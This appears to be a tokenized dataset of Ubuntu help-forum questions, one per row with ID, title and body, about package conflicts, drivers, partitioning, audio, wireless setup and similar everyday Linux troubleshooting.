240731	i 'm having a multi-arch problem . how can i fix it ?	running the following commands give me the same abrupt ending , any ideas ? 1. sudo apt-get -f install -y reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed google-talkplugin : i386 libasn1-8-heimdal : i386 libasound2 : i386 libasound2-plugins : i386 libasyncns0 : i386 libatk1.0-0 : i386 libaudio2 : i386 libavahi-client3 : i386 libavahi-common3 : i386 libc6 : i386 libcairo2 : i386 libcapi20-3 : i386 libcomerr2 : i386 libcroco3 : i386 libcups2 : i386 libdatrie1 : i386 libdb5.1 : i386 libdbus-1-3 : i386 libdbusmenu-qt2 : i386 libdrm-intel1 : i386 libdrm-nouveau2 : i386 libdrm-radeon1 : i386 libdrm2 : i386 libexif12 : i386 libexpat1 : i386 libffi6 : i386 libflac8 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcc1 : i386 libgcrypt11 : i386 libgd2-xpm : i386 libgdk-pixbuf2.0-0 : i386 libgettextpo0 : i386 libgif4 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libglib2.0-0 : i386 libglu1-mesa : i386 libgnutls26 : i386 libgomp1 : i386 libgpg-error0 : i386 libgphoto2-2 : i386 libgphoto2-port0 : i386 libgpm2 : i386 libgssapi-krb5-2 : i386 libgssapi3-heimdal : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libgtk2.0-0 : i386 libhcrypto4-heimdal : i386 libheimbase1-heimdal : i386 libheimntlm0-heimdal : i386 libhx509-5-heimdal : i386 libice6 : i386 libieee1284-3 : i386 libjack-jackd2-0 : i386 libjasper1 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libjson0 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-26-heimdal : i386 libkrb5-3 : i386 libkrb5support0 : i386 liblcms1 : i386 libldap-2.4-2 : i386 libllvm3.1 : i386 libltdl7 : i386 libmng1 : i386 libmpg123-0 : i386 libmysqlclient18 : i386 libncurses5 : i386 libogg0 : i386 libopenal1 : i386 liborc-0.4-0 : i386 libosmesa6 : i386 libp11-kit0 : i386 libpango1.0-0 : i386 libpciaccess0 : i386 libpcre3 : i386 libpixman-1-0 : i386 libpng12-0 : i386 libpulse0 : i386 libqt4-dbus : i386 libqt4-declarative : i386 libqt4-network : i386 libqt4-script : i386 libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 : i386 libqtgui4 : i386 libqtwebkit4 : i386 libroken18-heimdal : i386 libsamplerate0 : i386 libsane : i386 libsasl2-2 : i386 libsasl2-modules : i386 libselinux1 : i386 libsm6 : i386 libsndfile1 : i386 libspeexdsp1 : i386 libsqlite3-0 : i386 libssl1.0.0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libthai0 : i386 libtiff4 : i386 libtinfo5 : i386 libtxc-dxtn-s2tc0 : i386 libunistring0 : i386 libusb-0.1-4 : i386 libuuid1 : i386 libv4l-0 : i386 libv4lconvert0 : i386 libvorbis0a : i386 libvorbisenc2 : i386 libwind0-heimdal : i386 libwrap0 : i386 libx11-6 : i386 libx11-xcb1 : i386 libxau6 : i386 libxcb-glx0 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxcb1 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxft2 : i386 libxi6 : i386 libxinerama1 : i386 libxml2 : i386 libxpm4 : i386 libxrandr2 : i386 libxrender1 : i386 libxslt1.1 : i386 libxss1 : i386 libxt6 : i386 libxv1 : i386 libxxf86vm1 : i386 playonlinux skype skype-bin : i386 sni-qt : i386 wine wine1.5 wine1.5-amd64 wine1.5-i386 : i386 zlib1g : i386 0 upgraded , 0 newly installed , 157 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 514 mb disk space will be freed . e : internal error , no file name for libc6 another attempt sudo aptitude -- full-resolver safe-upgrade the following partially installed packages will be configured : libc6 { b } libc6 : i386 { b } no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . the following packages have unmet dependencies : libc6 : breaks : libc6 : i386 ( ! = 2.15-0ubuntu10.3 ) but 2.16-0ubuntu8 is installed . libc6 : i386 : breaks : libc6 ( ! = 2.16-0ubuntu8 ) but 2.15-0ubuntu10.3 is installed . internal error : the solver install ( espeak : i386 1.46.02-0ubuntu1 < espeak-data : amd64 1.46.02-0ubuntu1 -s > { espeak : amd64 1.46.02-0ubuntu1 espeak : i386 1.46.02-0ubuntu1 } > ) of a supposedly unresolved dependency is already installed in step 82 internal error : the solver install ( espeak : i386 1.46.02-0ubuntu1 < espeak-data : amd64 1.46.02-0ubuntu1 -s > { espeak : amd64 1.46.02-0ubuntu1 espeak : i386 1.46.02-0ubuntu1 } > ) of a supposedly unresolved dependency is already installed in step 157 internal error : the solver install ( espeak : i386 1.46.02-0ubuntu1 < espeak-data : amd64 1.46.02-0ubuntu1 -s > { espeak : amd64 1.46.02-0ubuntu1 espeak : i386 1.46.02-0ubuntu1 } > ) of a supposedly unresolved dependency is already installed in step 178 internal error : the solver install ( espeak : i386 1.46.02-0ubuntu1 < espeak-data : amd64 1.46.02-0ubuntu1 -s > { espeak : amd64 1.46.02-0ubuntu1 espeak : i386 1.46.02-0ubuntu1 } > ) of a supposedly unresolved dependency is already installed in step 189 internal error : the solver install ( wine1.5 : i386 1.5.21-0ubuntu1 < wine1.5-amd64 : amd64 1.5.21-0ubuntu1 - > { wine1.5 : amd64 1.5.21-0ubuntu1 wine1.5 : i386 1.5.21-0ubuntu1 } > ) of a supposedly unresolved dependency is already installed in step 246 internal error : the solver install ( fontconfig-config : amd64 2.8.0-3ubuntu9 < libfontconfig1 : i386 2.8.0-3ubuntu9 - > { fontconfig-config : amd64 2.8.0-3ubuntu9 } > ) of a supposedly unresolved dependency is already installed in step 456 open : 369 ; closed : 1248 ; defer : 234 ; conflict : 465 .internal error : the solver install ( qdbus : i386 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 < libqt4-dbus : amd64 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 -s > { qdbus : amd64 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 qdbus : i386 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 } > ) of a supposedly unresolved dependency is already installed in step 1929 open : 438 ; closed : 1496 ; defer : 293 ; conflict : 665 ointernal error : the solver install ( qdbus : i386 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 < libqt4-dbus : amd64 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 -s > { qdbus : amd64 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 qdbus : i386 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 } > ) of a supposedly unresolved dependency is already installed in step 2032 internal error : the solver install ( qdbus : i386 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 < libqt4-dbus : amd64 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 -s > { qdbus : amd64 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 qdbus : i386 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 } > ) of a supposedly unresolved dependency is already installed in step 2115 internal error : the solver install ( qdbus : i386 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 < libqt4-dbus : amd64 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 -s > { qdbus : amd64 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 qdbus : i386 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 } > ) of a supposedly unresolved dependency is already installed in step 2257 open : 466 ; closed : 1790 ; defer : 302 ; conflict : 678 ointernal error : the solver install ( wine1.4-i386 : i386 1.4.1-0ubuntu1~precise1~ppa3 < wine1.4 : amd64 1.4.1-0ubuntu1~precise1~ppa3 - > { wine1.4-i386 : i386 1.4.1-0ubuntu1~precise1~ppa3 } > ) of a supposedly unresolved dependency is already installed in step 2432 internal error : the solver install ( mysql-common : amd64 5.5.22-0ubuntu1 < libmysqlclient18 : i386 5.5.22-0ubuntu1 - > { mysql-common : amd64 5.5.22-0ubuntu1 mysql-common : amd64 5.5.28-0ubuntu0.12.04.3 } > ) of a supposedly unresolved dependency is already installed in step 2433 internal error : the solver install ( wine1.4-i386 : i386 1.4-0ubuntu4.1 < wine1.4 : amd64 1.4-0ubuntu4.1 - > { wine1.4-i386 : i386 1.4-0ubuntu4.1 } > ) of a supposedly unresolved dependency is already installed in step 2439 internal error : the solver install ( wine1.4-i386 : i386 1.4-0ubuntu4 < wine1.4 : amd64 1.4-0ubuntu4 - > { wine1.4-i386 : i386 1.4-0ubuntu4 } > ) of a supposedly unresolved dependency is already installed in step 2441 the following actions will resolve these dependencies : remove the following packages : 1 ) google-talkplugin : i386 2 ) libasn1-8-heimdal : i386 3 ) libasound2 : i386 4 ) libasound2-plugins : i386 5 ) libasyncns0 : i386 6 ) libatk1.0-0 : i386 7 ) libaudio2 : i386 8 ) libavahi-client3 : i386 9 ) libavahi-common3 : i386 10 ) libc6 : i386 11 ) libcairo2 : i386 12 ) libcapi20-3 : i386 13 ) libcomerr2 : i386 14 ) libcroco3 : i386 15 ) libcups2 : i386 16 ) libdatrie1 : i386 17 ) libdb5.1 : i386 18 ) libdbus-1-3 : i386 19 ) libdbusmenu-qt2 : i386 20 ) libdrm-intel1 : i386 21 ) libdrm-nouveau2 : i386 22 ) libdrm-radeon1 : i386 23 ) libdrm2 : i386 24 ) libexif12 : i386 25 ) libexpat1 : i386 26 ) libffi6 : i386 27 ) libflac8 : i386 28 ) libfontconfig1 : i386 29 ) libfreetype6 : i386 30 ) libgcc1 : i386 31 ) libgcrypt11 : i386 32 ) libgd2-xpm : i386 33 ) libgdk-pixbuf2.0-0 : i386 34 ) libgettextpo0 : i386 35 ) libgif4 : i386 36 ) libgl1-mesa-dri : i386 37 ) libgl1-mesa-glx : i386 38 ) libglapi-mesa : i386 39 ) libglib2.0-0 : i386 40 ) libglu1-mesa : i386 41 ) libgnutls26 : i386 42 ) libgomp1 : i386 43 ) libgpg-error0 : i386 44 ) libgphoto2-2 : i386 45 ) libgphoto2-port0 : i386 46 ) libgpm2 : i386 47 ) libgssapi-krb5-2 : i386 48 ) libgssapi3-heimdal : i386 49 ) libgstreamer-plugins-base0.10-0 : i386 50 ) libgstreamer0.10-0 : i386 51 ) libgtk2.0-0 : i386 52 ) libhcrypto4-heimdal : i386 53 ) libheimbase1-heimdal : i386 54 ) libheimntlm0-heimdal : i386 55 ) libhx509-5-heimdal : i386 56 ) libice6 : i386 57 ) libieee1284-3 : i386 58 ) libjack-jackd2-0 : i386 59 ) libjasper1 : i386 60 ) libjpeg-turbo8 : i386 61 ) libjpeg8 : i386 62 ) libjson0 : i386 63 ) libk5crypto3 : i386 64 ) libkeyutils1 : i386 65 ) libkrb5-26-heimdal : i386 66 ) libkrb5-3 : i386 67 ) libkrb5support0 : i386 68 ) liblcms1 : i386 69 ) libldap-2.4-2 : i386 70 ) libllvm3.1 : i386 71 ) libltdl7 : i386 72 ) libmng1 : i386 73 ) libmpg123-0 : i386 74 ) libmysqlclient18 : i386 75 ) libncurses5 : i386 76 ) libogg0 : i386 77 ) libopenal1 : i386 78 ) liborc-0.4-0 : i386 79 ) libosmesa6 : i386 80 ) libp11-kit0 : i386 81 ) libpango1.0-0 : i386 82 ) libpciaccess0 : i386 83 ) libpcre3 : i386 84 ) libpixman-1-0 : i386 85 ) libpng12-0 : i386 86 ) libpulse0 : i386 87 ) libqt4-dbus : i386 88 ) libqt4-declarative : i386 89 ) libqt4-network : i386 90 ) libqt4-script : i386 91 ) libqt4-sql : i386 92 ) libqt4-sql-mysql : i386 93 ) libqt4-xml : i386 94 ) libqt4-xmlpatterns : i386 95 ) libqtcore4 : i386 96 ) libqtgui4 : i386 97 ) libqtwebkit4 : i386 98 ) libroken18-heimdal : i386 99 ) libsamplerate0 : i386 100 libsane : i386 101 libsasl2-2 : i386 102 libsasl2-modules : i386 103 libselinux1 : i386 104 libsm6 : i386 105 libsndfile1 : i386 106 libspeexdsp1 : i386 107 libsqlite3-0 : i386 108 libssl1.0.0 : i386 109 libstdc++6 : i386 110 libtasn1-3 : i386 111 libthai0 : i386 112 libtiff4 : i386 113 libtinfo5 : i386 114 libtxc-dxtn-s2tc0 : i386 115 libunistring0 : i386 116 libusb-0.1-4 : i386 117 libuuid1 : i386 118 libv4l-0 : i386 119 libv4lconvert0 : i386 120 libvorbis0a : i386 121 libvorbisenc2 : i386 122 libwind0-heimdal : i386 123 libwrap0 : i386 124 libx11-6 : i386 125 libx11-xcb1 : i386 126 libxau6 : i386 127 libxcb-glx0 : i386 128 libxcb-render0 : i386 129 libxcb-shm0 : i386 130 libxcb1 : i386 131 libxcomposite1 : i386 132 libxcursor1 : i386 133 libxdamage1 : i386 134 libxdmcp6 : i386 135 libxext6 : i386 136 libxfixes3 : i386 137 libxft2 : i386 138 libxi6 : i386 139 libxinerama1 : i386 140 libxml2 : i386 141 libxpm4 : i386 142 libxrandr2 : i386 143 libxrender1 : i386 144 libxslt1.1 : i386 145 libxss1 : i386 146 libxt6 : i386 147 libxv1 : i386 148 libxxf86vm1 : i386 149 playonlinux 150 skype 151 skype-bin : i386 152 sni-qt : i386 153 wine 154 wine-gecko1.8 : i386 155 wine1.5 156 wine1.5-amd64 157 wine1.5-i386 : i386 158 zlib1g : i386 leave the following dependencies unresolved : 159 libncurses5 : i386 recommends libgpm2 : i386 160 libgphoto2-2 : i386 recommends udev : i386 ( > = 0.175 ) 161 libgphoto2-2 : i386 recommends libgphoto2-l10n : i386 ( > = 2.4.13-1ubuntu1.2 ) 162 libqt4-sql : i386 recommends libqt4-sql-mysql : i386 | libqt4-sql-odbc : i386 163 libqt4-dbus : i386 recommends qdbus : i386 ( = 4:4.8.2+dfsg-2ubuntu1~precise1 164 skype-bin : i386 recommends libasound2-plugins : i386 165 winetricks recommends wine1.5 | wine1.4 | wine | cxoffice5 | cxgames5 166 wine-mono0.0.8 recommends wine1.5 167 wine-gecko1.8 recommends wine1.5-amd64 168 wine1.5-i386 : i386 recommends libsane : i386 169 wine-gecko1.8 : i386 recommends wine1.5-i386 : i386 170 libgl1-mesa-glx : i386 recommends libgl1-mesa-dri : i386 ( > = 7.2 ) accept this solution ? [ y/n/q/ ? ] y the following packages will be removed : google-talkplugin : i386 { a } libasn1-8-heimdal : i386 { a } libasound2 : i386 { a } libasound2-plugins : i386 { a } libasyncns0 : i386 { a } libatk1.0-0 : i386 { a } libaudio2 : i386 { a } libavahi-client3 : i386 { a } libavahi-common3 : i386 { a } libc6 : i386 { a } libcairo2 : i386 { a } libcapi20-3 : i386 { a } libcomerr2 : i386 { a } libcroco3 : i386 { a } libcups2 : i386 { a } libdatrie1 : i386 { a } libdb5.1 : i386 { a } libdbus-1-3 : i386 { a } libdbusmenu-qt2 : i386 { a } libdrm-intel1 : i386 { a } libdrm-nouveau2 : i386 { a } libdrm-radeon1 : i386 { a } libdrm2 : i386 { a } libexif12 : i386 { a } libexpat1 : i386 { a } libffi6 : i386 { a } libflac8 : i386 { a } libfontconfig1 : i386 { a } libfreetype6 : i386 { a } libgcc1 : i386 { a } libgcrypt11 : i386 { a } libgd2-xpm : i386 { a } libgdk-pixbuf2.0-0 : i386 { a } libgettextpo0 : i386 { a } libgif4 : i386 { a } libgl1-mesa-dri : i386 { a } libgl1-mesa-glx : i386 { a } libglapi-mesa : i386 { a } libglib2.0-0 : i386 { a } libglu1-mesa : i386 { a } libgnutls26 : i386 { a } libgomp1 : i386 { a } libgpg-error0 : i386 { a } libgphoto2-2 : i386 { a } libgphoto2-port0 : i386 { a } libgpm2 : i386 { a } libgssapi-krb5-2 : i386 { a } libgssapi3-heimdal : i386 { a } libgstreamer-plugins-base0.10-0 : i386 { a } libgstreamer0.10-0 : i386 { a } libgtk2.0-0 : i386 { a } libhcrypto4-heimdal : i386 { a } libheimbase1-heimdal : i386 { a } libheimntlm0-heimdal : i386 { a } libhx509-5-heimdal : i386 { a } libice6 : i386 { a } libieee1284-3 : i386 { a } libjack-jackd2-0 : i386 { a } libjasper1 : i386 { a } libjpeg-turbo8 : i386 { a } libjpeg8 : i386 { a } libjson0 : i386 { a } libk5crypto3 : i386 { a } libkeyutils1 : i386 { a } libkrb5-26-heimdal : i386 { a } libkrb5-3 : i386 { a } libkrb5support0 : i386 { a } liblcms1 : i386 { a } libldap-2.4-2 : i386 { a } libllvm3.1 : i386 { a } libltdl7 : i386 { a } libmng1 : i386 { a } libmpg123-0 : i386 { a } libmysqlclient18 : i386 { a } libncurses5 : i386 { a } libogg0 : i386 { a } libopenal1 : i386 { a } liborc-0.4-0 : i386 { a } libosmesa6 : i386 { a } libp11-kit0 : i386 { a } libpango1.0-0 : i386 { a } libpciaccess0 : i386 { a } libpcre3 : i386 { a } libpixman-1-0 : i386 { a } libpng12-0 : i386 { a } libpulse0 : i386 { a } libqt4-dbus : i386 { a } libqt4-declarative : i386 { a } libqt4-network : i386 { a } libqt4-script : i386 { a } libqt4-sql : i386 { a } libqt4-sql-mysql : i386 { a } libqt4-xml : i386 { a } libqt4-xmlpatterns : i386 { a } libqtcore4 : i386 { a } libqtgui4 : i386 { a } libqtwebkit4 : i386 { a } libroken18-heimdal : i386 { a } libsamplerate0 : i386 { a } libsane : i386 { a } libsasl2-2 : i386 { a } libsasl2-modules : i386 { a } libselinux1 : i386 { a } libsm6 : i386 { a } libsndfile1 : i386 { a } libspeexdsp1 : i386 { a } libsqlite3-0 : i386 { a } libssl1.0.0 : i386 { a } libstdc++6 : i386 { a } libtasn1-3 : i386 { a } libthai0 : i386 { a } libtiff4 : i386 { a } libtinfo5 : i386 { a } libtxc-dxtn-s2tc0 : i386 { a } libunistring0 : i386 { a } libusb-0.1-4 : i386 { a } libuuid1 : i386 { a } libv4l-0 : i386 { a } libv4lconvert0 : i386 { a } libvorbis0a : i386 { a } libvorbisenc2 : i386 { a } libwind0-heimdal : i386 { a } libwrap0 : i386 { a } libx11-6 : i386 { a } libx11-xcb1 : i386 { a } libxau6 : i386 { a } libxcb-glx0 : i386 { a } libxcb-render0 : i386 { a } libxcb-shm0 : i386 { a } libxcb1 : i386 { a } libxcomposite1 : i386 { a } libxcursor1 : i386 { a } libxdamage1 : i386 { a } libxdmcp6 : i386 { a } libxext6 : i386 { a } libxfixes3 : i386 { a } libxft2 : i386 { a } libxi6 : i386 { a } libxinerama1 : i386 { a } libxml2 : i386 { a } libxpm4 : i386 { a } libxrandr2 : i386 { a } libxrender1 : i386 { a } libxslt1.1 : i386 { a } libxss1 : i386 { a } libxt6 : i386 { a } libxv1 : i386 { a } libxxf86vm1 : i386 { a } playonlinux { a } skype { a } skype-bin : i386 { a } sni-qt : i386 { a } wine { a } wine-gecko1.8 : i386 { a } wine1.5 { a } wine1.5-amd64 { a } wine1.5-i386 : i386 { a } zlib1g : i386 { a } the following partially installed packages will be configured : libc6 0 packages upgraded , 0 newly installed , 158 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 532 mb will be freed . do you want to continue ? [ y/n/ ? ] y e : internal error , no file name for libc6 more commands could follow with the same ending , but you get the picture , anyone have the fix ?
240733	how do i remove the ubuntu software center ?	i have a pretty slow computer , and every time i open ubuntu software center , the entire computer slows down , and 97 % of the time , it hangs . so , i was wondering whether you can uninstall ubuntu software center . oh , and by the way , i use terminal to install my softwares .
240737	use of another graphic tablet , other than wacom ?	i do not have a wacom tablet . instead , i have an iball tablet , which contains installations only for xp and mac osx . is there any way , i can use it for lubuntu 12.04 lts ? thanks .
240740	google account integration in ubuntu 12.10	i 'm new to ubuntu and i recently installed 12.10 . since i 'm having problems with online accounts ( including google , which does n't seem to integrate anything in my os ) i would like to know what exactly a google account is used for . does it add gmail into the messaging menu ( without gm-notify or similar apps ) and syncs my google calendar with the default ubuntu calendar ?
240742	ralink 3290 slow	i got ralink 3290 working by installing the firmware from the kernel git repository ( http : //git.kernel.org/ ? p=linux/kernel/git/dwmw2/linux-firmware.git ; a=tree ) . the connection seems much slower than my previous laptop ? anyone experienced such thing ? would i get a performance gain by installing manufacturer 's sta file ? thanks
240743	ubuntuone client for android stucking on upload	i 've a galaxy nexus and just installed the ubuntuone client and set the autoupload feature . as soon as i take my pictures the client starts to upload the files but after 2 or 3 files it stucks on sync . if i open the ui it continues the upload and then stuck again . i 've no idea why such strange behavior .
240745	how do i get a larger screen resolution in virtualbox on mac os x ?	i am running the new mac air 13 '' with os x 10.8.2 . i then downloaded the latest virtualbox 4.2.6 . then , i installed ubuntu 10.04 into the vm . first off , after i installed the virtualbox guest additions and restarted the vm , the ubuntu desktop froze after the gdm login and i had to delete the vboxguestadditions folders out of /opt and /usr/lib to get back to normal again . second , i go to ubuntu 's system > preferences > monitors and try to change the settings , and there 's nothing higher than 800x600 . i then tried the virtualbox various view menu settings and tried again in ubuntu 's system > preferences > monitors and i 'm still stuck .
240747	pulseaudio no sound card mplayer ok	i 'm running version 12.10 . my pc has an built-in sound card and 3 usb sound cards of the same type . mplayer works ok for all of them using the argument -ao alsa : device=hw=2.0 for instance . vlc -- aout=hw=2.0 does not work . pacmd does not list any card . starting pulseaudio manually results in failed to open module `` alsa '' : file not found . hwinfo shows the built-in card only . lsusb shows the connected cards correctly and the corresponding files /sys/class/sound/pcmc ? d0p/uevent look ok as well . please advice .
240749	packaging for the ubuntu software center	i have a question about packaging for the ubuntu software center : must the package to upload be a .deb file ? if so , how do i create one ? i do n't use the pygobject api .
240751	magicjack driver	i am looking for a magicjack driver for for ubuntu 11.10 . does anyone know if one exists , and if so , please point me in the right direction ? i have reviewed many message boards and this is the only one that comes close to answering my question .
240754	how to achieve echo cancellation with pulse audio ?	i want to use echo cancellation for my skype calls and empathy on ubuntu 12.10 ( pulseaudio 2.1 ) . anyone knows how to do that ?
240757	how can i make peristent changes on a usb ubuntu install ?	here 's what i 've tried with no success : unetbootin : it keeps hanging . linux live usb : i only get an empty folder as the result universal installer : it has n't worked . can i use my ubunu cd-rom in persistent mode ?
240762	vista/ubuntu install problem	i was trying to decide on installing ubuntu along with my windows vista . i copied the install files to my windows and installed from there . everything seem to go okay and i assumed that ubuntu install created another partition for me , but i 'm not sure . anyway , ubuntu started up nice and runs nice , but when i booted to ubuntu , i found that i lost my authentication . is there a way to restore that without going through microsoft ?
240764	i am trying to run ubuntu 12.10 alongside windows 7 and need some help with partitioning my hd properly !	ok so here is the problem , last night i burned a ubuntu 12.10 on a disc , great ! bootable ubuntu disc , however i am aware that i need to make some partitions in my hd to accomidate this in order to dual boot , however in my disc manager on both windows and ubuntu i have 4 partitions already on my disc drive they are labeled as follows windows7_os ( c : ) ntfs ( system boot , page file , active , crash dump , primary partition ) 262.81 gb capacity , 174.29 gb free space lenovo ( d : ) ntfs ( primary partition ) 25.47 gb capactity , 21.79 gb free space ( e : ) ntfs ( primary partition ) 200mb capactity , 165 mb free space unlabeled ( oem partition ) 19.53gb capactity , 9.53 gb free space lastnight i made an error and tried partitioning my harddrive in ububntu and windows would not boot so i had to go and undo my partition ( s ) that i made off the windows 7 parition and everything worked fine again , now i boot windows go into disc management and shrunk my windows partiton to the size it is now in windows and i now have 363.05 gb unallocated disc space available , how do i use this space when i already have 4 partitions and how do i partition properly so i dont loose windows in the process , my ubuntu will not give me the install option alongside windows , just the advanced option and completely errasing windows and installing ubuntu , any help please , i am a noob in this dept and dont want to wreck my rather new computer ... . thank you anyone who can help ! !
240765	video tearing on radeon running ubuntu 12.10 need help with xorg.conf ( i think )	i 've recently managed to get 3d accelerated graphics working on my laptop with a radeon hd 7520g . i 'm using the default xorg driver ( i.e. , not the proprietary ones which seem to create worse problems like breaking x ) . running /usr/lib/nux/unity_support_test -p produces : opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd aruba opengl version string : 2.1 mesa 9.0 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes which is all good ( the `` not software rendered '' used to say no , for instance ) . video playback is great . unfortunately games ( and glxgears ) produce really bad video tearing ( or artifacts -- not sure the proper technical terms but whatever it is it looks very bad ) . i 've found advice on editing xorg.conf to try different options to fix the problem . the problem is that there is no xorg.conf file ( apparently it 's no longer needed ? ) . when i try to create one or copy one from somewhere else either i lose the accelerated graphics completely or x is no longer able to start . i guess what i need is a working xorg.conf file for my situation which i can then play with to see if any options will help my situation . alternately , any other solutions to the tearing would be appreciated ( that most likely do not include the proprietary drivers as they seem to break my system ) .
240766	wifi problems with lenovo g580 and ubuntu 12.10	i just bought a lenovo g580 laptop , and installed ubuntu 12.10 on it , everything works fine except for the wifi connection , it connects fine but keeps dropping every few seconds and even when connected its extremely slow and ubuntu will take a while to find the network to begin with . the connection is working fine on windows , what is the problem ? the wirelss adapter is : broadcom 4313 specific model : bcm4313hmgb bgn thanks
240768	disable laptop touchpad when wacom tablet is plugged ?	i want to disable automatically the laptop touchpad when i plug in a wacom cth-470l graphic tablet . i read here an answer about a touchpad-indicator , but it is n't available to 12.10 . i have also tried the gpointing-device-settings , but it does n't provide such an option . besides , there is a bug with this package regarding setting persistence after reboot . i 'm aware of the «disable touchpad while typing» feature of the «mouse and touchpad» settings , but this is not what i 'm looking for .
240773	ubuntu 12.10 and windows 8	1 ) i tried the methods given in the forum without much luck . i have a sony vaio windows 8 -preinstalled laptop . i downloaded ubuntu and copied it to flash drive and tried to reboot - i get a message the flash drive is empty - when the flash drive clearly has ubuntu . 2 ) the other problem is i had earlier tried to install using windows installer , i got an error message but the screen goes back to a page offering me the choice of the operating system between ubuntu and windows 8 . when i click ubuntu i get the error message again re the missing boot file . i would appreciate some help
240780	why can not install lubuntu 12.10 on an extended partition ?	this is about an older computer ( toshiba satellite m70 that a friend wants to keep afloat ) on which ( beside win xp ) was installed the xubuntu 11.10 system that would not work for some reason : now the idea would be to format/repartition the non-windows space and to install lubuntu 12.10 . but the installation procedure stops indefinitely immediately after setting the internet connection : after `` continue '' it would just lag . renouncing to use an internet connection has the same results . this computer does not support usb-boot so i have to use the live cd . gparted shows the following configuration : i see that the previous installation was on an extended partition . a very useful answer that i have received here said that a system should not be on an extended partition . is this the cause why the installation stops ? ( my idea is to use a live gparted cd to format and repartition the space according to the answer above - create two primary partitions and select mount point as / and /home . ) computer specs : http : //paste.ubuntu.com/1528395/ edit/update : in gparted live environment was able to delete one by one the swap and the ext4 partition and afterwards the extended partition . but the same problem happened , even after trying a different cd with a different iso , lubuntu 12.04 : until in this case i have renounced connecting to the internet - see my answer
240781	i need to convert ext2 filesystem to ext4 to prevent fsck every time i boot ?	installed ubuntu 12.10 alongside manufacturer-installed win 8 with no problems . was `` clever '' enough to install as ext2 filesystem , which has resulted in the inconvenience of fsck making the usual checks every time i boot up . sure , i could just press `` c '' to cancel the check , but that gets a little old after a while . i 've already tried tinkering with the maximum mount count in tune2fs , but that has n't made any difference . it looks like i have to convert my ext2 filesystem to ext4 . i could do this via the information provided here but have also noticed that i can enable some of the features of ext4 , as detailed in this answer , by running the following command ... sudo tune2fs -o has_journal , uninit_bg , extents /dev/sda1 ... and rebooting . is it necessary to do the full filesystem conversion , or will the fsck be eliminated by running the above command in terminal to enable some ext4 features ?
240782	automatic differential backup solution for lucid-server ?	i just have 1gb backup space on a ftp host . i need to automatically backup my server if any file has been changed . on this page i found some packages , but which is better for server ?
240784	ca n't connect to wireless on ubuntu server	i 'm having some trouble connecting to a wireless network on ubuntu server 12.10 . i have the driver installed with ndiswrapper , i can scan with iwlist wlan0 scan , and i 'm trying to use wpa_supplicant to configure the interface . however , iwconfig is showing that i 'm not connected to an access point . /etc/network/interfaces # wireless interface auto wlan0 iface wlan0 inet dhcp wpa-driver ndiswrapper wpa-ssid `` turkradio '' wpa-ap-scan 2 wpa-proto rsn wpa-pairwise ccmp wpa-group ccmp wpa-key-mgmt wpa-psk wpa-psk key-from-wpa-passphrase /etc/wpa_supplicant.conf # ctrl_interface=/var/run/wpa_supplicant ap_scan=2 network= { ssid= '' turkradio '' scan_ssid=1 proto=rsn key_mgmt=wpa-psk group=tkip pairwise=tkip # psk= '' key '' psk=encrypted_key } ifconfig wlan0 link encap : ethernet hwaddr 08:86:3b:8a : d5 : a5 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) iwconfig wlan0 ieee 802.11g essid : off/any mode : managed frequency:2.442 ghz access point : not-associated bit rate:54 mb/s tx-power:20 dbm sensitivity=0/3 rts thr : off fragment thr : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 how can i correctly configure my interface ?
240785	hp laserjet 1000	please can you help basically i just want my laserjet 1000 to work with ubuntu live cd and to save the setting how to get hp laser jet to work in ubuntu 12.04 . i thought ubuntu already had hplip to work with laserjet 1000 little box but when i plunging printer it error wo n't download the required plugin for laserjet 1000 i will follow your instructions plead help
240786	is there a work around to get playon media server to work on ubuntu ?	recently , a netflix on ubuntu solution was posted at is there a way to stream netflix ? is there a similar solution for playon media server ? playon ( not playonlinux ) is a media server that lets you watch many different networks and internet streams by transcoding the stream and serving them to any device capable of receiving media streams . it supports plugins and has many such plugins for different streams . further info can be found on their website http : //www.playon.tv/ i would much prefer a solution that does n't involve running it in a virtual machine .
